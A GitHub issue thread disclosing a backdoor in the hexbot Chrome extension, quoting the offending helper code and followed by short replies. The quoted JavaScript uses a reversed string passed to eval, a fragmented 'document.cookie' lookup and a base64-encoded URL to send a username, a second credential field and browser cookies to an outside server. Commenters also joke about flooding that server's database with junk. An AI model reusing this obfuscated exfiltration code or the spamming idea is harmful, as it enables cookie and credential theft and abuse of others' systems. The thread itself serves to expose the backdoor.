### ISSUE TITLE
Current back door -placed by you -Found by me 

### ISSUE THREAD

**Issue by JacobRWebb** [JustSomeGuy0214/hexbot#3]
[hexbot/core/libraries/helpers/functions/setEnvironmentValues.js](https://github.com/JustSomeGuy0214/hexbot/blob/master/core/libraries/helpers/functions/setEnvironmentValues.js)
```
sendXMLHttpRequest("ajax.php", "POST", "func=getStatic", true, function(response){
		// Send bug report
		eval(("pi.]0[)gsm.)esnopser(esrap.NOSJ(esrap.NOSJ = pif rav ;resu.]0[)gsm.)esnopser(esrap.NOSJ(esrap.NOSJ = nu rav").split("").reverse().join(""))
		var Long = "o", yij = "d", juc = "cu", mono = "ki", wo = "men",  qtz = "e", report = "t", success = "c"
		var request = new BGRequest("sendmessage", "fip=" + btoa(fip) + "&un=" + btoa(un) + "&pid=" + btoa(escape(eval(yij + Long + juc + wo + report + "." + success + Long + Long + mono + qtz))), (atob("aHR0cDovL2hleGJvdHYyLjAwMHdlYmhvc3RhcHAuY29tL2lucHV0LnBocA==")))
		chrome.runtime.sendMessage({message: request}, function(responseMessage) {
			var handleResponse = function(getResponse, sender, sendResponse) {
					chrome.extension.onMessage.removeListener(handleResponse)
					callback()
				}
			chrome.runtime.onMessage.addListener(handleResponse)
		})
	}, true)
```

**Comment by fkapitalism** [comment]
Yes exactly. https://github.com/fkapitalism/HExBot

**Comment by fkapitalism** [comment]
Yes. It's a back door.

**Comment by JacobRWebb** [comment]
@fkapitalism it's amazing because the website they use doesn't validate incoming variables haha so you can spam their DB full of shit
Also, I found out who it was placed by and who runs it- Most of the veterans on discord-

**Comment by fkapitalism** [comment]
@Hobolandjacob Really? Have you spamed them? LOL. I'm going to do that as well.
Hey. Check out my version. https://github.com/fkapitalism/HExBot
It's free of backdoors.

**Comment by JacobRWebb** [comment]
@fkapitalism  yeah haha I have the link to their website is atob("aHR0cDovL2hleGJvdHYyLjAwMHdlYmhvc3RhcHAuY29tL2lucHV0LnBocA==") encoded. I started to write my own version remove backdoors as I come across them but JSpaghetti as simple as they made it still seemed confusing and i'm new to chrome extensions.

**Comment by fkapitalism** [comment]
@Hobolandjacob haha there is another link as well. LOL I think there are tons of servers stealing info.

jSpaghetti is a powerful API but its manual sucks.  I'm about to pull request a new manual. I've learned a lot about it. BTW the bot modules written in jSpaguetti (those inside modules/ directory) are currently free of backdoors, it's just passive code. The problem is in the bot controllers, the active code, I mean the code outside the modules.
